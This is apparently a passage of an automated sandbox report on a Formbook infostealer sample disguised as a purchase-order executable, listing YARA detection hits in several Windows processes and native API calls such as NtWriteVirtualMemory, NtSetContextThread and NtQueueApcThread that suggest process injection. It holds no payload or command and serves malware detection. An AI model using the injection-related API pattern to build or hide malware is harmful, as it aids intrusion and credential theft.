Source: 00000000.00000002.2176143982.00000000039CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.2411207031.000000000352B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000015.00000002.2411207031.000000000352B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.2411207031.000000000352B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.3366459232.0000000004520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.3366459232.0000000004520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.3366459232.0000000004520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000036.00000002.2805551760.0000000004534000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000036.00000002.2805551760.0000000004534000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000036.00000002.2805551760.0000000004534000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000046.00000002.2895699701.0000000005070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000046.00000002.2895699701.0000000005070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000046.00000002.2895699701.0000000005070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000002.2436330065.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001C.00000002.2436330065.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001C.00000002.2436330065.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000004E.00000002.3035230297.0000000003190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000004E.00000002.3035230297.0000000003190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000004E.00000002.3035230297.0000000003190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000003E.00000002.2823024000.0000000000960000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000003E.00000002.2823024000.0000000000960000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000003E.00000002.2823024000.0000000000960000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000003F.00000002.2884163790.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000003F.00000002.2884163790.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000003F.00000002.2884163790.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000047.00000002.3030559754.00000000045B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000047.00000002.3030559754.00000000045B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000047.00000002.3030559754.00000000045B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000025.00000002.2526649554.0000000000B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000025.00000002.2526649554.0000000000B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000025.00000002.2526649554.0000000000B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.3366396664.00000000044F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.3366396664.00000000044F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.3366396664.00000000044F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: PURCHASED ORDER OF ENG091.exe PID: 3472, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: RegAsm.exe PID: 5412, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR	Matched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: Process Memory Space: cmstp.exe PID: 5552, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: PURCHASED ORDER OF ENG091.pif PID: 5728, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: cmmon32.exe PID: 4620, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: PURCHASED ORDER OF ENG091.pif PID: 4872, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: msdt.exe PID: 3700, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: PURCHASED ORDER OF ENG091.pif.pif PID: 3004, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: msdt.exe PID: 6540, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: PURCHASED ORDER OF ENG091.pif.pif PID: 3924, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: rundll32.exe PID: 1824, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: PURCHASED ORDER OF ENG091.pif.pif.pif PID: 5128, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: wlanext.exe PID: 3632, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: PURCHASED ORDER OF ENG091.pif.pif.pif PID: 2264, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: msdt.exe PID: 5748, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: PURCHASED ORDER OF ENG091.pif.pif.pif.pif PID: 2704, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: chkdsk.exe PID: 6488, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: PURCHASED ORDER OF ENG091.pif.pif.pif.pif PID: 6648, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: netsh.exe PID: 5096, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: PURCHASED ORDER OF ENG091.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041A340 NtCreateFile,	7_2_0041A340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041A3F0 NtReadFile,	7_2_0041A3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041A470 NtClose,	7_2_0041A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041A520 NtAllocateVirtualMemory,	7_2_0041A520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041A3EA NtReadFile,	7_2_0041A3EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041A392 NtCreateFile,NtReadFile,	7_2_0041A392
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041A43A NtReadFile,	7_2_0041A43A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03392B60 NtClose,LdrInitializeThunk,	7_2_03392B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03392BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_03392BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03392AD0 NtReadFile,LdrInitializeThunk,	7_2_03392AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03392F30 NtCreateSection,LdrInitializeThunk,	7_2_03392F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03392FB0 NtResumeThread,LdrInitializeThunk,	7_2_03392FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03392F90 NtProtectVirtualMemory,LdrInitializeThunk,	7_2_03392F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03392FE0 NtCreateFile,LdrInitializeThunk,	7_2_03392FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03392EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	7_2_03392EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03392E80 NtReadVirtualMemory,LdrInitializeThunk,	7_2_03392E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03392D30 NtUnmapViewOfSection,LdrInitializeThunk,	7_2_03392D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03392D10 NtMapViewOfSection,LdrInitializeThunk,	7_2_03392D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03392DF0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_03392DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03392DD0 NtDelayExecution,LdrInitializeThunk,	7_2_03392DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03392C70 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_03392C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03392CA0 NtQueryInformationToken,LdrInitializeThunk,	7_2_03392CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03394340 NtSetContextThread,	7_2_03394340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03394650 NtSuspendThread,	7_2_03394650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03392BA0 NtEnumerateValueKey,	7_2_03392BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03392B80 NtQueryInformationFile,	7_2_03392B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03392BE0 NtQueryValueKey,	7_2_03392BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03392AB0 NtWaitForSingleObject,	7_2_03392AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03392AF0 NtWriteFile,	7_2_03392AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03392F60 NtCreateProcessEx,	7_2_03392F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03392FA0 NtQuerySection,	7_2_03392FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03392E30 NtWriteVirtualMemory,	7_2_03392E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03392EE0 NtQueueApcThread,	7_2_03392EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03392D00 NtSetInformationFile,	7_2_03392D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03392DB0 NtEnumerateKey,	7_2_03392DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03392C00 NtQueryInformationProcess,	7_2_03392C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03392C60 NtCreateKey,	7_2_03392C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03392CF0 NtOpenProcess,	7_2_03392CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03392CC0 NtQueryVirtualMemory,	7_2_03392CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03393010 NtOpenDirectoryObject,	7_2_03393010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03393090 NtSetValueKey,	7_2_03393090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033935C0 NtCreateMutant,	7_2_033935C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033939B0 NtGetContextThread,	7_2_033939B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03393D10 NtOpenProcessToken,	7_2_03393D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03393D70 NtOpenThread,	7_2_03393D70
Source: C:\Windows\explorer.exe	Code function: 8_2_1135C232 NtCreateFile,	8_2_1135C232
Source: C:\Windows\explorer.exe	Code function: 8_2_1135DE12 NtProtectVirtualMemory,	8_2_1135DE12
Source: C:\Windows\explorer.exe	Code function: 8_2_1135DE0A NtProtectVirtualMemory,	8_2_1135DE0A

Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Code function: 0_2_00A8D57C	0_2_00A8D57C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00401030	7_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041D8D3	7_2_0041D8D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041E222	7_2_0041E222
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041E5D6	7_2_0041E5D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041D583	7_2_0041D583
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00402D90	7_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041EDA5	7_2_0041EDA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041DDB3	7_2_0041DDB3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00409E5B	7_2_00409E5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00409E60	7_2_00409E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00402FB0	7_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0341A352	7_2_0341A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_034203E6	7_2_034203E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0336E3F0	7_2_0336E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03400274	7_2_03400274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033E02C0	7_2_033E02C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033FA118	7_2_033FA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03350100	7_2_03350100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033E8158	7_2_033E8158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_034181CC	7_2_034181CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_034141A2	7_2_034141A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_034201AA	7_2_034201AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033F2000	7_2_033F2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03360770	7_2_03360770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03384750	7_2_03384750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0335C7C0	7_2_0335C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0337C6E0	7_2_0337C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03360535	7_2_03360535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03420591	7_2_03420591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03412446	7_2_03412446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03404420	7_2_03404420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0340E4F6	7_2_0340E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0341AB40	7_2_0341AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03416BD7	7_2_03416BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0335EA80	7_2_0335EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03376962	7_2_03376962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033629A0	7_2_033629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0342A9A6	7_2_0342A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03362840	7_2_03362840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0336A840	7_2_0336A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033468B8	7_2_033468B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338E8F0	7_2_0338E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03380F30	7_2_03380F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033A2F28	7_2_033A2F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03402F30	7_2_03402F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D4F40	7_2_033D4F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033DEFA0	7_2_033DEFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0336CFE0	7_2_0336CFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03352FC8	7_2_03352FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0341EE26	7_2_0341EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03360E59	7_2_03360E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0341EEDB	7_2_0341EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03372E90	7_2_03372E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0341CE93	7_2_0341CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033FCD1F	7_2_033FCD1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0336AD00	7_2_0336AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03378DBF	7_2_03378DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0335ADE0	7_2_0335ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03360C00	7_2_03360C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03350CF2	7_2_03350CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03400CB5	7_2_03400CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0341132D	7_2_0341132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0334D34C	7_2_0334D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033A739A	7_2_033A739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033652A0	7_2_033652A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_034012ED	7_2_034012ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0337B2C0	7_2_0337B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0342B16B	7_2_0342B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0334F172	7_2_0334F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0339516C	7_2_0339516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0336B1B0	7_2_0336B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0340F0CC	7_2_0340F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0341F0E0	7_2_0341F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_034170E9	7_2_034170E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033670C0	7_2_033670C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0341F7B0	7_2_0341F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033A5630	7_2_033A5630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_034116CC	7_2_034116CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03417571	7_2_03417571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033FD5B0	7_2_033FD5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03351460	7_2_03351460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0341F43F	7_2_0341F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0341FB76	7_2_0341FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0337FB80	7_2_0337FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0339DBF9	7_2_0339DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D5BF0	7_2_033D5BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03417A46	7_2_03417A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0341FA49	7_2_0341FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D3A6C	7_2_033D3A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0340DAC6	7_2_0340DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033FDAAC	7_2_033FDAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033A5AA0	7_2_033A5AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03401AA3	7_2_03401AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033F5910	7_2_033F5910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03369950	7_2_03369950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0337B950	7_2_0337B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033CD800	7_2_033CD800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033638E0	7_2_033638E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0341FF09	7_2_0341FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03361F92	7_2_03361F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0341FFB1	7_2_0341FFB1
